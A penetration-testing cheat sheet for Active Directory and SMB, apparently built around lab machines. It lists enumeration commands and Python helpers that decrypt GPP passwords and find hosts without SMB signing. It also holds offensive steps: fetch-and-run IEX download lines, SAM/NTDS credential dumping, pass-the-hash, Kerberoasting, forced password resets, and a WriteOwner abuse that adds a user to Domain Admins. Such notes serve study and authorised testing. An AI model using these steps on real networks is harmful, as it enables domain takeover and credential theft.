Active Directory / SMB

00. Basic Notes

  • Any account name ending in $ is either a machine (computer) account or a managed service account (MSA/gMSA).

  • SID structure.

## ------------------| Generate an NT hash from a password (MD4 over the UTF-16LE encoding)
iconv -f ASCII -t UTF-16LE <(printf "<Password>") | openssl dgst -md4
## OpenSSL 3.x moved MD4 into the legacy provider; if the command errors, add: -provider legacy -provider default
  • objectSid to SID representation

import sys
import base64
import struct

def convert(binary):
    # objectSid layout: revision(1) | sub-authority count(1) | 48-bit big-endian
    # identifier authority | count x 32-bit little-endian sub-authorities
    revision = struct.unpack('B', binary[0:1])[0]
    # Only revision 1 exists; anything else means this is not a SID
    assert revision == 1, revision
    length = struct.unpack('B', binary[1:2])[0]
    authority = struct.unpack('>Q', b'\x00\x00' + binary[2:8])[0]
    string = 'S-%d-%d' % (revision, authority)
    binary = binary[8:]
    assert len(binary) == 4 * length
    for i in range(length):
        value = struct.unpack('<L', binary[4*i:4*(i+1)])[0]
        string += '-%d' % value
    return string

if __name__ == '__main__':
    # Argument is the base64 objectSid as returned by ldapsearch / ldapdomaindump
    print(convert(base64.b64decode(sys.argv[1])))

## python3 binary2SID.py <base64==>
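Going the other way, as an added example that is not part of the original notes: build the binary objectSid from its string form (an LDAP search by SID needs the escaped binary value in the filter), and pull the domain SID and RID out of any domain-relative SID, which is what the /sid: and -domain-sid arguments of Rubeus and ticketer later on this page want. The function names are my own.

```python
# Added example: SID string -> binary objectSid, LDAP filter escaping, and
# domain SID / RID extraction. Inverse of the binary2SID.py script above.
import struct


def sid_to_bytes(sid: str) -> bytes:
    parts = sid.split("-")
    if len(parts) < 3 or parts[0].upper() != "S":
        raise ValueError("not a SID: %r" % sid)
    revision = int(parts[1])
    authority = int(parts[2])
    subauths = [int(p) for p in parts[3:]]
    if revision != 1 or not 0 <= authority < 2 ** 48 or len(subauths) > 15:
        raise ValueError("SID out of range: %r" % sid)
    # revision(1) | sub-authority count(1) | 48-bit big-endian authority | 32-bit LE sub-authorities
    out = struct.pack("BB", revision, len(subauths))
    out += struct.pack(">Q", authority)[2:]
    out += b"".join(struct.pack("<L", s) for s in subauths)
    return out


def ldap_escape(raw: bytes) -> str:
    """RFC 4515 escaping for a binary value inside a search filter: every byte as \\xx."""
    return "".join("\\%02x" % b for b in raw)


def objectsid_filter(sid: str) -> str:
    """Filter usable with ldapsearch / Get-ADObject -LDAPFilter to find the object owning `sid`."""
    return "(objectSid=%s)" % ldap_escape(sid_to_bytes(sid))


def domain_sid(sid: str) -> str:
    """Strip the RID: S-1-5-21-a-b-c-500 -> S-1-5-21-a-b-c (the value ticketer/Rubeus want)."""
    parts = sid.split("-")
    if len(parts) != 8 or parts[:4] != ["S", "1", "5", "21"]:
        raise ValueError("not a domain-relative principal SID: %r" % sid)
    return "-".join(parts[:-1])


def rid(sid: str) -> int:
    """Last sub-authority; 500 = built-in Administrator, 502 = krbtgt, 512 = Domain Admins."""
    return int(sid.rsplit("-", 1)[1])
```

Paste the output of objectsid_filter() into `ldapsearch ... '<filter>'` or `Get-ADObject -LDAPFilter '<filter>'`; the RID is what the `rpcclient queryuser 0x...` loop below iterates over.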
  • Basic commands

## ------------------| Joined to a domain?
##[Windows]
systeminfo | findstr /B "Domain"
### If you see something other than Domain: WORKGROUP, then you are likely joined to a domain
##[Linux]
ls -al /etc/krb5.conf                 # present and populated on domain-joined (sssd/realmd) hosts
sudo kinit -k host/$(hostname -f)     # succeeds only if the machine keytab (/etc/krb5.keytab) is valid

## ------------------| Enumerating Domain Admins
net group "Domain Admins" /domain

## ------------------| Enumerating any other domain group (Server_Admin is an example name)
net group "Server_Admin" /domain

## ------------------| List all users on entire domain
net user /domain

## ------------------| List all groups
net group /domain

## ------------------| List groups for h4rith user
net user h4rith /domain

## ------------------| Current domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

## ------------------| Domain trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

## ------------------| Current forest info
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

## ------------------| Get forest trust relationships
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()

## ------------------| Get DCs of a domain
nltest /dclist:offense.local
net group "domain controllers" /domain

## ------------------| Get DC for currently authenticated session
nltest /dsgetdc:offense.local

## ------------------| Get domain trusts from cmd shell
nltest /domain_trusts

## ------------------| Get user info
nltest /user:"spotless"

## ------------------| List smb shares
Get-SmbShare
Get-SmbShare -Name C$ | select *

## ------------------| Creating a new file share
New-SmbShare -Name <ShareName> -Description "This is description" -Path C:\Shares\<ShareName>      

## ------------------| Modifying share properties
Set-SmbShare -Name <ShareName> -Description "This is description" -Force

## ------------------| Granting file share permissions
Grant-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -AccessRight Full -Force
## You can use Everyone instead of <DOMAIN>\<USER>
## You can use Read, Change or Custom instead of Full

## ------------------| Removing file share permissions
Revoke-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
## You can use Everyone instead of <DOMAIN>\<USER>

## ------------------| Denying permissions to a file share
Block-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
Unblock-SmbShareAccess -Name <ShareName> -AccountName <DOMAIN>\<USER> -Force
## You can use Everyone instead of <DOMAIN>\<USER>

## ------------------| Removing a file share
Remove-SmbShare -Name <ShareName> -Force

## ------------------| DC that authenticated the current session (LOGONSERVER variable; works on old systems)
set l

## ------------------| Get domain name and DC the user authenticated to
klist

## ------------------| Get all logon sessions. Includes NTLM authenticated sessions
klist sessions

## ------------------| Kerberos tickets for the session
klist

## ------------------| Cached TGT (krbtgt ticket) for the session
klist tgt

## ------------------| Whoami on older Windows systems (USERNAME / USERDOMAIN variables)
set u

## ------------------| Find DFS shares with ADModule
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name

## ------------------| Find DFS shares with ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name}

## ------------------| Check if the Print Spooler is reachable on a host (pipe exists => spoolss is exposed)
powershell ls "\\dc01\pipe\spoolss"
  • Find GPP Passwords in SYSVOL

## ------------------| Manual
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml

## ------------------| PowerSploit
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1 
IEX(New-Object Net.WebClient).DownloadString('http://<IP>/Get-GPPPassword.ps1')
Get-GPPPassword
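What Get-GPPPassword does, as an added example that is not part of the original notes and not PowerSploit's code: walk a local copy of SYSVOL (or any directory of GPP XML files), pull every cpassword with the account it belongs to, and decrypt it with the AES-256 key Microsoft published in MS-GPPREF 2.2.1.1.4. The two XML documents are constructed samples shaped like Groups.xml and ScheduledTasks.xml; the cpassword value in them is a widely circulated test vector that decrypts to "GPPstillStandingStrong2k18". Decryption needs pycryptodome or cryptography; without either, decrypt_cpassword() returns None and you still get the inventory. Function names are my own.

```python
# Added example: inventory and decrypt GPP cpassword values from SYSVOL XML.
import base64
import os
import xml.etree.ElementTree as ET

# Published AES-256 key from MS-GPPREF 2.2.1.1.4 "Password Encryption"
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
# Attribute naming the account, per GPP file type (Groups/Services/ScheduledTasks/DataSources, Drives, Printers)
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def decrypt_cpassword(cpassword: str):
    """AES-256-CBC, zero IV, PKCS#7 padding, UTF-16LE plaintext. Returns None if no AES backend is installed."""
    data = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))  # GPP strips base64 padding
    iv = b"\x00" * 16
    try:
        from Crypto.Cipher import AES  # pycryptodome
        plain = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv).decrypt(data)
    except ImportError:
        try:
            from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
            dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(iv)).decryptor()
            plain = dec.update(data) + dec.finalize()
        except ImportError:
            return None
    pad = plain[-1]
    if not 1 <= pad <= 16:
        raise ValueError("bad PKCS#7 padding: not a GPP cpassword or corrupt value")
    return plain[:-pad].decode("utf-16-le")


def find_cpasswords_in_xml(xml_text: str, source: str = "<string>"):
    """Return [(source, account, cpassword, plaintext_or_None)] for one GPP XML document."""
    found = []
    root = ET.fromstring(xml_text)
    for props in root.iter("Properties"):
        cpw = props.get("cpassword")
        if not cpw:  # GPP writes cpassword="" when no password was set
            continue
        account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
        found.append((source, account, cpw, decrypt_cpassword(cpw)))
    return found


def find_cpasswords(sysvol_dir: str):
    """Recurse a SYSVOL copy (e.g. pulled with smbclient mget) and collect every cpassword."""
    found = []
    for dirpath, _dirs, files in os.walk(sysvol_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found += find_cpasswords_in_xml(fh.read(), path)
            except ET.ParseError:
                pass  # not every .xml under Policies is a preference file
    return found


# Constructed samples; the cpassword is the public test vector mentioned in the lead-in.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="EXAMPLE\\svc_backup">
    <Properties action="U" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="EXAMPLE\\svc_backup"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="nopass">
    <Properties action="U" cpassword="" userName="nopass"/>
  </User>
</Groups>"""

SAMPLE_TASKS_XML = """<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <Task clsid="{2DEECB1C-261F-4e13-9B21-16FB83BC03BD}" name="backup">
    <Properties action="C" runAs="EXAMPLE\\svc_task" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" name="backup"/>
  </Task>
</ScheduledTasks>"""

if __name__ == "__main__":
    for hit in find_cpasswords_in_xml(SAMPLE_GROUPS_XML, "Groups.xml") + find_cpasswords_in_xml(SAMPLE_TASKS_XML, "ScheduledTasks.xml"):
        print(hit)
```

Point find_cpasswords() at the directory you pulled with `smbclient -N //<DC>/SYSVOL -c "prompt OFF;recurse ON;mget *"`; the account column tells you which file type the hit came from (userName = Groups.xml, runAs = ScheduledTasks.xml, accountName = Services.xml).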
  • Adding a user to useful local groups.

## ------------------| Add to the Remote Desktop Users
net localgroup "Remote Desktop Users" harith /add

## ------------------| Add to the WinRM Users
net localgroup "Remote Management Users" harith /add

## ------------------| Add to the Administrator group
net localgroup "Administrators" harith  /add

01. SMB Enumerations

00. Basic

  • Find smb version

sudo tcpdump -s0 -n -i tun0 src $IP and port 139 -A -c 10 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.'        
sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L //$IP

01. SMBclient

## ------------------| List all 
smbclient -N -L //<IP>

## ------------------| For old Samba / SMB1-only servers
smbclient -N //<IP>/ --option='client min protocol=NT1'

## ------------------| Download all files from a share (drop -N if the account has a password)
smbclient -N //<IP>/<SHARENAME> -U <USERNAME> -c "prompt OFF;recurse ON;mget *"

## ------------------| Login as a user (user%password in one argument)
smbclient -U '<UserName>%<Password>' //10.10.10.178/c$

## ------------------| Show the ACL of a share / path
## if it has ACL:Everyone:ALLOWED/OI|CI/FULL we can write/read
smbcacls -N //10.10.10.103/Department /Users

02. CrackMapExec

## ------------------| Enumerate hosts
crackmapexec smb 192.168.3.201-203

## ------------------| Tricks
## CrackMapExec authenticates against the domain by default; to test local accounts
## use -d WORKGROUP (or --local-auth)

## ------------------| Enumerate shares / basic info
crackmapexec smb 10.10.10.178
crackmapexec smb 10.10.10.161 --shares
crackmapexec smb 10.10.10.161 -u '' -p '' --shares
## A non-existent user with an empty password tests whether Guest access is enabled
crackmapexec smb 10.10.10.161 -u 'DoesNotExist' -p '' --shares
crackmapexec smb 10.10.10.161 -u 'DoesNotExist' -H <NThash>
crackmapexec smb 10.10.10.161 -d WORKGROUP -u 'DoesNotExist' -H <NThash>

## ------------------| Enumerate active sessions
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --sessions 

## ------------------| Enumerate disks
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --disks

## ------------------| Enumerate logged on users
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --loggedon-users

## ------------------| Enumerate domain users
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --users

## ------------------| Enumerate users by bruteforcing RID
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --rid-brute

## ------------------| Enumerate domain groups
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --groups

## ------------------| Enumerate local groups
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --local-groups

## ------------------| Identify SMB Signing Disabled
crackmapexec smb --gen-relay-list output.txt 10.10.10.0/24
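What --gen-relay-list actually checks, as an added example that is not from the original notes: the SecurityMode field of the SMB2 NEGOTIATE response. A host that sets SIGNING_ENABLED but not SIGNING_REQUIRED will accept an unsigned, relayed session. The responses here are constructed by a helper so the parser can be exercised offline; in practice you feed smb2_security_mode() the bytes read back after sending an SMB2 NEGOTIATE to port 445. Function names are my own.

```python
# Added example: decide from a raw SMB2 NEGOTIATE response whether signing
# is required (MS-SMB2 2.2.4), which is the relay-target test.
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001   # set on every server response
SIGNING_ENABLED = 0x0001                  # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002                 # SMB2_NEGOTIATE_SIGNING_REQUIRED


def strip_netbios(pkt: bytes) -> bytes:
    """Port 445 wraps each SMB message in a 4-byte NetBIOS session header: 0x00 + 24-bit length."""
    if len(pkt) >= 4 and pkt[0] == 0 and pkt[1:4] == struct.pack(">I", len(pkt) - 4)[1:]:
        return pkt[4:]
    return pkt


def smb2_security_mode(pkt: bytes) -> int:
    """Return the 16-bit SecurityMode of an SMB2 NEGOTIATE response, validating the framing first."""
    msg = strip_netbios(pkt)
    if len(msg) < 64 + 4 or msg[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    hdr_size = struct.unpack_from("<H", msg, 4)[0]     # header StructureSize, always 64
    command = struct.unpack_from("<H", msg, 12)[0]     # Command
    flags = struct.unpack_from("<I", msg, 16)[0]       # Flags
    if hdr_size != 64 or command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    struct_size, security_mode = struct.unpack_from("<HH", msg, 64)  # body follows the 64-byte header
    if struct_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize %d" % struct_size)
    return security_mode


def signing_required(pkt: bytes) -> bool:
    return bool(smb2_security_mode(pkt) & SIGNING_REQUIRED)


def relay_targets(responses: dict) -> list:
    """{host: raw negotiate response} -> hosts that do not require signing (the --gen-relay-list output)."""
    return sorted(host for host, pkt in responses.items() if not signing_required(pkt))


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed SMB2 NEGOTIATE response (NetBIOS header + SMB2 header + body, unused fields zeroed)."""
    header = SMB2_MAGIC + struct.pack(
        "<HHIHHIIQIIQ16s",
        64, 0, 0,                    # StructureSize, CreditCharge, Status
        SMB2_NEGOTIATE, 1,           # Command, CreditResponse
        SMB2_FLAGS_SERVER_TO_REDIR,  # Flags
        0, 0, 0, 0, 0,               # NextCommand, MessageId, Reserved, TreeId, SessionId
        b"\x00" * 16)                # Signature
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect, 0,   # StructureSize, SecurityMode, DialectRevision, NegotiateContextCount
        b"\x00" * 16,                    # ServerGuid
        0, 0, 0, 0,                      # Capabilities, MaxTransactSize, MaxReadSize, MaxWriteSize
        0, 0,                            # SystemTime, ServerStartTime
        0, 0, 0)                         # SecurityBufferOffset, SecurityBufferLength, NegotiateContextOffset
    msg = header + body
    return b"\x00" + struct.pack(">I", len(msg))[1:] + msg


if __name__ == "__main__":
    sample = {"10.10.10.1": build_negotiate_response(SIGNING_ENABLED | SIGNING_REQUIRED),
              "10.10.10.5": build_negotiate_response(SIGNING_ENABLED)}
    print(relay_targets(sample))
```

Domain controllers require signing by default; member servers and workstations only enable it, which is why they dominate relay target lists. SMB1 reports the same property elsewhere (the one-byte SecurityMode of its NEGOTIATE response, bit 0x08 = required) and is not handled here.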

## ------------------| Enumerate password policy
## if Account Lockout Threshold: None there is no lockout, so brute force / password spraying is safe
crackmapexec smb 10.10.10.161 --pass-pol
crackmapexec smb 10.10.10.161 -u '' -p '' --pass-pol

## ------------------| Dump SAM/LSA/NTDS.dit
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --sam
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --lsa
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --ntds 
crackmapexec smb 10.10.10.161 -u UserName -p 'Password' --ntds vss

## ------------------| Execute Commands
## PowerShell 
crackmapexec winrm 10.10.10.169 -u melanie -p 'Welcome123!' -X "whoami /all"
## CMD
crackmapexec winrm 10.10.10.169 -u melanie -p 'Welcome123!' -x "whoami /all"

## ------------------| Crawling shares
crackmapexec smb 10.10.10.149 -u 'username' -p 'PassW0rd' -M spider_plus 

03. SMBMap

## ------------------| List shares
smbmap -H 10.10.10.178
smbmap -u 'anonymous' -H 10.10.10.134
smbmap -u 'anonymous' -p 'anonymous' -H 10.10.10.134

## ------------------| Recursively list
smbmap -R directory -H 10.10.10.100

## ------------------| Download file
smbmap -R directory -H 10.10.10.100 -A filename.txt -q
  • General flags

-H HOST               IP of host
--host-file FILE      File containing a list of hosts
-u USERNAME           Username, if omitted null session assumed
-p PASSWORD           Password or NTLM hash
--prompt              Prompt for a password
-s SHARE              Specify a share (default C$), ex 'C$'
-d DOMAIN             Domain name (default WORKGROUP)
-P PORT               SMB port (default 445)
-v                    Return the OS version of the remote host
-x COMMAND            Execute a command ex. 'ipconfig /all'
-L                    List all drives on the specified host (requires ADMIN)
-R [PATH]             Recursively list dirs.
-r [PATH]             List contents of directory.
-g FILE               Output to a file in a grep friendly format
--dir-only            List only directories, omit files.
--depth DEPTH         Traverse a directory tree to a specific depth.
--download PATH       Download a file from the remote system
--upload              Upload a file to the remote system
--delete PATH         Delete a remote file, ex. 'C$\temp\msf.exe'
--skip                Skip delete file confirmation prompt

04. RPCClient

## ------------------| Login as user
rpcclient -U 'support' <IP>
rpcclient -U 'Administrator:Password' <IP>

## ------------------| Null auth
rpcclient -U '' <IP>

## ------------------| Enumerations
lookupnames Guest
enumdomusers
queryuser 0x450
enumprinters

## ------------------| Change a user's password (needs ForceChangePassword / reset rights on the target)
setuserinfo2 <UserAccount> 23 '<Password>'

## ------------------| Brute Forcing User RIDs
for i in $(seq 500 1100);do rpcclient -N -U "" <IP> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done    

05. Samrdump.py

impacket-samrdump <IP>

06. Evil-WinRm

## ------------------| Normal Usage
evil-winrm -u UserName -p Password -i 10.10.10.149 
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

## ------------------| With SSL (port 5986)
evil-winrm -S -i 10.10.10.103 -c amanda.cer -k amanda.key -P 5986
evil-winrm -S -i 10.10.10.103 -c amanda.cer -k amanda.key -u amanda -P 5986

## If you get a message like "The term 'Invoke-Expression' is not recognized as the name of a cmdlet"
## the remote session is in Constrained Language Mode. Try a native PowerShell remoting session instead:
sudo apt-get install gss-ntlmssp
pwsh
$pass = ConvertTo-SecureString '<PassWord>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<ACCOUNT_NAME>', $pass)
Enter-PSSession -ComputerName <IP> -Credential $cred -Authentication Negotiate

07. PsExec

## ------------------| Enable remote access to the administrative shares (ADMIN$, C$, IPC$) for local admin accounts
REG add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

## ------------------| With a password (needs write access to ADMIN$; psexec drops a service binary there)
impacket-psexec HTB/James:'J@m3s_P@ssW0rd!'@10.10.10.52

## ------------------| With an NTLM hash [Pass-the-Hash]; the LM part can be left empty (:<NThash>)
impacket-psexec Administrator@10.10.10.161 -hashes <LMhash>:<NThash>

02. Active Directory Enumeration

00. Basic

  • If you are in AD environment

## ------------------| Import ad module
Get-Module -Name ActiveDirectory -ListAvailable
Import-Module -Name ActiveDirectory

## ------------------| List all users + computers (objectClass=user matches both; the third filter excludes computers)
Get-ADObject -LDAPFilter "(objectClass=user)"
Get-ADObject -LDAPFilter "(objectCategory=user)"
Get-ADObject -LDAPFilter "(&(objectCategory=user)(!(objectClass=computer)))"

## ------------------| List all users whose account name starts with j
Get-ADObject -LDAPFilter "(sAMAccountName=j*)"
Get-ADObject -LDAPFilter "(sAMAccountName=j*)" -Properties cn,objectSid,description,givenname,sn

## ------------------| List all users which have an SPN (Service Principal Name) set; Kerberoast candidates (GetUserSPNs)
Get-ADObject -LDAPFilter "(servicePrincipalName=*)"
Get-ADObject -LDAPFilter "(servicePrincipalName=*)" -Properties servicePrincipalName
  • Microsoft ActiveDirectory PowerShell ADModule

## ------------------| Setup
wget https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1
wget https://github.com/samratashok/ADModule/raw/master/Microsoft.ActiveDirectory.Management.dll
## First you need to import the dll file [Use Absolute Path or .\Microsoft.ActiveDirectory.Management.dll]
Import-Module C:\Full\Path\Microsoft.ActiveDirectory.Management.dll -Verbose
# or : Import-ActiveDirectory -ActiveDirectoryModule C:\Full\Path\Microsoft.ActiveDirectory.Management.dll
. .\Import-ActiveDirectory.ps1
Get-Command -Module ActiveDirectory

## ------------------| Basic Domain Enum
Get-ADDomain                            # List current domain
Get-ADDomain -Identity <DomainName>     # List other domain info
(Get-ADDomain).DomainSID                # List domain SID value
Get-ADDomainController                  # List domain controllers
Get-ADDomainController -DomainName <Domain> -Discover

## ------------------| User Enumeration
Get-ADUser -Filter * -Properties *
Get-ADUser -Identity <UserName> -Properties *
Get-ADUser -Filter * -Properties * | select Name
Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Properties  | select Name 
Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description   

## ------------------| Computer Enumeration
Get-ADComputer -Filter * | select Name
Get-ADComputer -Filter 'OperatingSystem -like "*Windows*"' -Properties OperatingSystem | select Name,OperatingSystem
Get-ADComputer "<ComputerName>" -Properties * | Format-Table OperatingSystem,OperatingSystemVersion,OperatingSystemServicePack

## ------------------| Domain Group Enumeration
Get-ADGroup -Filter * | select name
Get-ADGroup -Filter * -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"' | select name
Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get-ADPrincipalGroupMembership -Identity <UserName>

## ------------------| Enumerate Organizational units [OUs]
Get-ADOrganizationalUnit -Filter * -Properties * | select name

## ------------------| Enumerate ACL
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=<Domain>').Access
(Get-Acl 'AD:\CN=Administrator,CN=Users,DC=<Domain>').Access | select IdentityReference,ActiveDirectoryRights | fl

## ------------------| Enumerate Domain Trusts
Get-ADTrust -Filter *
Get-ADTrust -Identity <FQDN>

## ------------------| Enumerate Domain Forests
Get-ADForest
(Get-ADForest).Domains
Get-ADForest -Identity <FQDN>
Get-ADForest | select -ExpandProperty GlobalCatalogs
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

  • PowerView

## ------------------| Load the script remotely & locally
IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/PowerView.ps1')
Import-Module .\PowerView.ps1
. .\PowerView.ps1

## ------------------| Enumerate Current Domain
Get-Domain
Get-Domain -Domain <DomainName>
Get-DomainSID

## ------------------| Enumerate Domain Controllers
Get-DomainController 
Get-DomainController -Domain <DomainName>

## ------------------| Enumerate Domain Computers
Get-NetComputer
Get-NetComputer | select name
Get-NetComputer | select Name,operatingsystem
Get-NetComputer -OperatingSystem "*Server 2016*" | select name,operatingsystem

## ------------------| Enumerate Domain Users
Get-DomainUser
Get-DomainUser -Identity <username>
Get-DomainUser | select cn
Get-DomainUser | select samaccountname,logoncount,lastlogon
Get-DomainUser -Identity <username> -Properties DisplayName, MemberOf,objectsid,useraccountcontrol | Format-List

## ------------------| Enumerate All Groups
Get-NetGroup
Get-NetGroup | select name
Get-NetGroup 'Domain Admins'
Get-NetGroup "*admin*"| select name 
Get-NetGroup -Domain <targetdomain> | select name
Get-NetGroupMember "Domain Admins" -Recurse | select MemberName

## ------------------| Enumerate Local Groups
Get-NetLocalGroup 
Get-NetLocalGroup | Select-Object GroupName
Get-NetLocalGroup -ComputerName <computername>
Get-NetGroup -UserName <"username">| select name
Get-NetGroupMember -MemberName "domain admins" -Recurse | select MemberName
Get-NetLocalGroupMember -GroupName Administrators | Select-Object MemberName, IsGroup, IsDomain

## ------------------| Enumerate Domain Policy
Get-DomainPolicy
(Get-DomainPolicy)."SystemAccess"
(Get-DomainPolicy)."kerberospolicy"
(Get-DomainPolicy -domain <DomainName>)."SystemAccess"

## ------------------| Enumerate Group Policy [GPO]
Get-NetGPO
Get-NetGPO | select displayname
Get-NetGPO -ComputerName <ComputeName>
Find-GPOComputerAdmin -ComputerName <ComputeName>
Find-GPOLocation -UserName <UserName> -Verbose

## ------------------| Enumerate Organizational Units [OUs]
Get-NetOU
Get-NetOU | select distinguishedname

## ------------------| Enumerate ACL
Invoke-ACLScanner -ResolveGUIDs # Time-consuming
Get-ObjectAcl -Identity <UserName> -ResolveGUIDs
Get-ObjectAcl -SamAccountName <UserName> -ResolveGUIDs 
Get-ObjectAcl -SamAccountName <UserName> -ResolveGUIDs | select ObjectDN,ActiveDirectoryRights | fl

## ------------------| Enumerate Domain Trusts
Get-DomainTrust
Get-DomainTrust -Domain <FQDN>

## ------------------| Enumerate Domain Forests
Get-Forest
Get-ForestTrust
Get-ForestDomain
Get-ForestGlobalCatalog
Get-Forest -Forest <Domain>
Get-ForestTrust -Forest <Domain>
Get-ForestDomain -Forest <Domain>
Get-ForestGlobalCatalog  -Forest <Domain>

## ------------------| List Domain or File Shares.
Find-DomainShare
Get-NetFileServer -Verbose
Invoke-ShareFinder -Verbose
Find-DomainShare -CheckShareAccess

## ------------------| Find sensitive files on computer in the domain
Invoke-FileFinder -Verbose

## ------------------| Request TGS
Request-SPNTicket 

## ------------------| Convert SID value to Name
"<SID>" | Convert-SidToName

## ------------------| Kerberoast
Invoke-Kerberoast
Invoke-Kerberoast -Identity <UserName>

## ------------------| Impersonate a user
$pass= ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('<Domain>\<User>', $pass)
Invoke-UserImpersonation -Credential $cred
Invoke-RevertToSelf

## ------------------| Special Enumerations
## Find all machines on the domain where current account has local admin access
Find-LocalAdminAccess -Verbose ## Very Noisy
Invoke-EnumerateLocalAdmin -Verbose ## Need Admin Prv

## List all Logged / Active on users
Get-NetLoggedon
Get-NetLoggedon -ComputerName <TargetMachineName> | Format-Table -AutoSize
Get-NetSession -ComputerName <DCName> | Format-Table -AutoSize

## List all Service Accounts [SPNs]
Get-NetUser -SPN
Get-NetUser | Where-Object {$_.servicePrincipalName} | select samaccountname,serviceprincipalname | fl

## List all Accounts with Kerberos pre-auth disabled [AS-REP Roasting]
Get-DomainUser -PreauthNotRequired -Verbose

## Find all computers which has sessions
Invoke-UserHunter 
Invoke-UserHunter -Stealth ## Only target high value machines
Invoke-UserHunter -CheckAccess
Invoke-UserHunter -GroupName "Domain Admins"
  • Abusing WriteOwner

## ------------------| Change owner
Set-DomainObjectOwner -Identity <User1> -OwnerIdentity <User2>

## ------------------| Grant the right to reset the target's password (then reset it, see Abusing ForceChangePassword)
Add-DomainObjectAcl -TargetIdentity Herman -PrincipalIdentity nico -Rights ResetPassword -Verbose

## ------------------| Change the ownership of a group
## Credentials are optional when you already run as the user holding WriteOwner
$pass = ConvertTo-SecureString 'W3llcr4ft3d_4cls' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('object.local\maria', $pass)
## Change the ownership of "Domain Admins" group
Set-DomainObjectOwner -Credential $cred -Identity "Domain Admins" -OwnerIdentity maria
## As owner, give maria all rights on the group
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
## maria can now add herself to the group
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
